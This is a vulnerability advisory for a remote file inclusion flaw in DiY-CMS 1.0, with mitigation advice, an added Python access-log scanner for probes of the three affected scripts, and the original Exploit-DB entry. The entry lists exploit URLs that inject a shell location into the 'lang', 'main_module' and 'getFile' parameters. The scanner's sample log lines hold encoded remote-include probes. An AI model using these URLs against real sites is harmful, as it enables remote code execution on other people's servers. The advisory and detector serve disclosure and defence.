Vendor: DiY-CMS
By: LoSt.HaCkEr and aDaM_TRoJaN
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: DiY-CMS
Affected Version From: v1.0
Affected Version To: v1.0
Patch Exists: NO
Platforms Tested: Windows XP
Year: 2010

DiY-CMS 1.0 Remote File Inclusion

DiY-CMS 1.0 is vulnerable to remote file inclusion. An attacker who exploits it can execute arbitrary code by causing the vulnerable PHP scripts to include remote files. The vulnerability exists in control.block.php, index.php, and general.functions.php. The attacker supplies the location of a malicious shell in the 'lang' and 'main_module' parameters (the raw entry below also lists 'getFile' for general.functions.php), which allows arbitrary code execution on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of the DiY-CMS software that addresses the remote file inclusion vulnerability. Additionally, input validation and sanitization should be implemented to prevent the inclusion of remote files in PHP scripts.
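
To check whether the three entry points in this advisory have been probed, the following added example (not part of the original advisory or of DiY-CMS) scans access-log lines for requests to those scripts whose lang, main_module or getFile parameter decodes to a URL scheme. The log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Added example; function names are illustrative. Script/parameter pairs are
# the three listed in this advisory.
WATCHED = {"control.block.php": "lang", "index.php": "main_module",
           "general.functions.php": "getFile"}
# A value that starts with a URL scheme or data: is not a language/module name.
SCHEME = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*://|data:)", re.I)
# Request line of a common/combined-format access-log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cms/index.php?main_module=news HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /cms/index.php?main_module=http://example.invalid/x.txt HTTP/1.1" 200 312',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /cms/modules/guestbook/blocks/control.block.php?lang=english HTTP/1.1" 200 87',
    '192.0.2.44 - - [01/Jan/2024:10:00:12 +0000] "GET /cms/modules/guestbook/blocks/control.block.php?lang=http%3A%2F%2Fexample.invalid%2Fa.txt HTTP/1.1" 200 0',
    '192.0.2.44 - - [01/Jan/2024:10:00:15 +0000] "GET /cms/includes/general.functions.php?getFile=%2568ttp%253A%252F%252Fexample.invalid%252Fc HTTP/1.1" 200 0',
]

def decode(value, rounds=3):
    """Undo repeated percent-encoding so a double-encoded scheme is still seen."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value

def suspicious(log_line):
    """Return (script, param, decoded value) for a flagged request, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    param = WATCHED.get(script)
    for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
        value = decode(value)
        if SCHEME.match(value):
            return script, param, value
    return None

def scan(lines):
    """Return (line number, script, param, value) for every flagged line."""
    found = ((n, suspicious(line)) for n, line in enumerate(lines, 1))
    return [(n, *hit) for n, hit in found if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Parameters sent in a POST body do not appear in access logs, so this covers query-string delivery only.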

Exploit-DB raw data:

# Exploit Title: [DiY-CMS 1.0 Remote File Inclusion ] 
# Date: [28-8-2010] 
# Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
# Software Link: [http://webscripts.softpedia.com/scriptDownload/DiY-CMS-Download-63258.html] 
# Version: [v 1.0 ] 
# Tested on: [Windows XP] 
# CVE : Hacker town of Musayyib
#Contact: LoSt.HaCkEr[at]yahoo[dot]com ~0r~ aDaM_TRoJaN@yahoo.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit: http://target/diycms_v1.0/diycms_v1.0/modules/guestbook/blocks/control.block.php?lang=[SHeLL]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit: http://target/diycms_v1.0/diycms_v1.0/index.php?main_module=[ShEll]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit: http://target/diycms_v1.0/diycms_v1.0/includes/general.functions.php?getFile=[SHELL]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers